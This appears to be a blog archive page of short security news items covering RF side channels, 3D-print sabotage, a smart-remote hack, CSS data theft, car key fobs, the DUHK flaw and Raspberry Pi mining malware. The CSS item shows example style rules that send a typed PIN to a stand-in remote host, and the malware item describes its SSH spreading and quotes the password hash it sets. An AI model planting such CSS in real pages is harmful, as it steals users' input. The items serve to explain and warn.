Screaming Channels Attack RF Security

As long as there has been radio, people have wanted to eavesdrop on radio transmissions. In many cases, it is just a hobby activity like listening to a scanner or monitoring a local repeater. But in some cases, it is spy agencies or cyberhackers. [Giovanni Camurati] and his colleagues have been working on a slightly different way to attack Bluetooth radio communications using a technique that could apply to other radio types, too. The attack relies on the ubiquitous use of mixed-signal ICs to make cheap radios like Bluetooth dongles. They call it “Screaming Channels” and — in a nutshell — it is relying on digital information leaking out on the device’s radio signal.

Does it work? The team claims to have recovered an AES-128 key from 10 meters away. The technique reminds us a bit of TEMPEST in that unintended radio transmissions provide insight into the algorithm the device applies to encrypt or decrypt data. Most (if not all) encryption techniques assume you can’t see inside the “black box.” If you can, then it’s because it is relatively easy to break the code.

Continue reading “Screaming Channels Attack RF Security”

3D Printing, Cybersecurity, and Audio Fingerprinting

We all understand the risk of someone taking over our computers or phones for nefarious purposes. But remote access to printers and fax machines was something most people took a little less seriously. After all, you might get some obscene printouts or someone wasting some paper, but in general, those are not big deals. Some researchers however have lately been pondering what might happen should someone break into your 3D printer. Of course, you could bring a printer down to deny service, or cause things to malfunction — maybe even in ways that could be dangerous if the printer didn’t have sufficient safety features. But these researchers are more crafty. They are studying how you know what you’ve printed hasn’t been subtly sabotaged. They also think they have an answer.

If you are printing another Benchy at home this probably isn’t a real concern. However, according to the paper, 3D printing now accounts for over $6 billion of revenue with 33.8% of all parts having some function. This includes a recent FAA approval for a 3D-printed fuel nozzle for a jet engine. So indulge us in a little science fiction. You are about to fly your drone to take video of an important social function. You are worried about one of your props, so you 3D print a new one. Too bad your competitor has hacked your computer with a phishing e-mail and modified your STL files so that the new prop will have built-in weak spots internally. The prop will look fine and you’ll be able to install it. But it is going to fail right when you are taking those critical shots.

Continue reading “3D Printing, Cybersecurity, and Audio Fingerprinting”

Harmony Hub Hacked and Patched

When we say “hack” here we most often mean either modifying something to do something different or building something out of parts. But as we build more Internet-connected things, it is worthwhile to think about the other kind of hack where people gain unauthorized access to a system. For example, you wouldn’t think a remote control would be a big deal for hackers. But the Logitech Harmony Hub connects to the Internet and runs Linux. What’s more is it can control smart devices like door locks and thermostats, so hacking it could cause problems. FireEye’s Mandian Red Team set out to hack the Harmony and found it had a lot of huge security problems.

The remote didn’t check Logitech’s SSL certificate for validity. It didn’t have a secure update process. There were developer tools (an SSH server) left inactive in the production firmware and — surprisingly — the root password was blank! The team shared their findings with Logitech before publishing the report and the latest patch from the company fixes these problems. But it is instructive to think about how your Raspberry Pi project would fare under the same scrutiny.

In fact, that’s the most interesting part of the story is the blow-by-blow description of the attack. We won’t spoil the details, but the approach was to feed the device a fake update package that turned on a dormant ssh server. Although they started by trying to solder wires to a serial port, that wasn’t productive and the final attack didn’t require any of that.

We’ve looked at some ways to harden Linux systems like the Raspberry Pi before, but honestly, it is an ongoing battle. We’ve seen plenty of devices with cybersecurity holes in them — some not found by good guy hackers first.

CSS Steals Your Web Data

Earlier this year, we posted a link to an interactive Web page. Most people seemed to like it, but we got at least one comment about how they would never be so incautious as to allow JavaScript to run on their computers. You can argue the relative merit of that statement, but it did remind us that just disabling JavaScript is no panacea when it comes to Internet security. You might wonder how you could steal data without scripting, assuming you don’t directly control the server or browser, of course. The answer is by using a cascading style sheet (CSS). [Live Overflow] explains the exploit in the video below, covering an older paper and a recent rediscovery of the technique.

The technique hinges on you getting a CSS into the web page. Maybe you’ve partially compromised the server or maybe you wrote a malicious browser extension. The method works because you can make a style conditional on an attribute of an element. That means you can ask CSS to do some special formatting on a text field with a certain value. If that formatting is to load some background image from a server you control then you can tell if the field has a particular value.

We didn’t say it was easy. Suppose you want to capture a four-digit PIN number. You will need about 10,000 lines of format. For example:

input[type="pin"][value$="0000"] { background-color: url(http://notahackaday.com/0000.png }
input[type="pin"][value$="0001"] { background-color: url(http://notahackaday.com/0001.png }
...
input[type="pin"][value$="9999"] { background-color: url(http://notahackaday.com/9999.png }

Continue reading “CSS Steals Your Web Data”

Samy Kamkar: Reverse Engineering for a Secure Future

Show of hands: how many of you have parked your car in the driveway, walked up to your house, and pressed your car’s key fob button thinking it would open the front door? We’ve probably all done it and felt a little dopey as a result, but when you think about it, it would be tremendously convenient, especially with grocery bags dangling off each arm and the mail clenched between your teeth. After all, we’re living in the future —  shouldn’t your house be smart enough to know when you’re home?

Reverse engineer par excellence Samy Kamkar might think so, but given his recent experiences with cars smart enough to know when you’re standing outside them, he’d probably have some reservations. Samy dropped by the 2017 Hackaday Superconference in November to discuss the finer points of exploiting security flaws in passive car entry systems, and also sat down with our own Elliot Williams after his talk for a one-on-one interview. Samy has some interesting insights on vehicle cybersecurity, but the practical knowledge he’s gained while exploring the limits of these systems teach some powerful lessons about being a real-world reverse engineer.

Continue reading “Samy Kamkar: Reverse Engineering for a Secure Future”

DUHK: Don’t Use Hard-Coded Keys

The title reads like the name of a lecture in cryptography 101 or the first rule of Crypto Club. ‘DUHK‘ is in fact neither of those but the name of a recently disclosed vulnerability in a pseudorandom number generating algorithm (PNRG) that was until recently part of the federal standard X9.31.

Random numbers are essential to viable cryptography. They are also hard to obtain leading to solutions like using the physical properties of semiconductors or decaying matter, that are governed by quantum effects. The next best solution is to log events that are hard to predict like the timing of strokes on a keyboard. The weakest source of randomness is math, which makes sense, because one of maths most popular features is its predictability. Mathematical solutions have the one redeeming quality of being able to produce a lot of numbers that look random to a human in a short time.

PNRGs require a starting point from which they begin to produce their output. Once this seed is known the produced sequence becomes predictable.

The X9.31 PNRG is an algorithm that is used in various cryptographic algorithms and has been certified in the Federal Information Processing Standards for decades until it was dropped from the list of approved standards in 2016. The researchers behind DUHK found out that the standard allowed the seed to be stored in the source code of its implementation. The next step was to look for software that did this and they found X9.31 in an older version of FortiOS running on VPN gateways.

Should I be Worried?

Probably, maybe not. The analysis (PDF) published by the team behind DUHK notes that the vulnerability is limited to legacy implementations and doesn’t allow to takeover the device running them, only to eavesdrop on ‘secure’ connections. The scope of this is much more limited than exploits like remote code execution via bluetooth. It is on the other hand providing a strong case for handling standards and technical certifications with extreme scrutiny. The teams conduct also gives insight into the best practises for white-hat hacking which are frequently discussed around here. And they have a great theme song.

Raspberry Pi Malware Mines BitCoin

According to Russian security site [Dr.Web], there’s a new malware called Linux.MulDrop.14 striking Raspberry Pi computers. In a separate posting, the site examines two different Pi-based trojans including Linux.MulDrop.14. That trojan uses your Pi to mine BitCoins some form of cryptocurrency. The other trojan sets up a proxy server.

According to the site:

Linux Trojan that is a bash script containing a mining program, which is compressed with gzip and encrypted with base64. Once launched, the script shuts down several processes and installs libraries required for its operation. It also installs zmap and sshpass.

It changes the password of the user “pi” to “\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1”.

In addition, the malware searches for network machines with open port 22 and tries to log in using the default Raspberry Pi credentials to spread itself.

Embedded systems are a particularly inviting target for hackers. Sometimes it is for the value of the physical system they monitor or control. In others, it is just the compute power which can be used for denial of service attacks on others, spam, or — in the case — BitCoin mining. We wonder how large does your Raspberry Pi botnet needs to be to compete in the mining realm?

We hope you haven’t kept the default passwords on your Pi. In fact, we hope you’ve taken our previous advice and set up two factor authentication. You can do other things too, like change the ssh port, run fail2ban, or implement port knocking. Of course, if you use Samba to share Windows files and printers, you ought to read about that vulnerability, as well.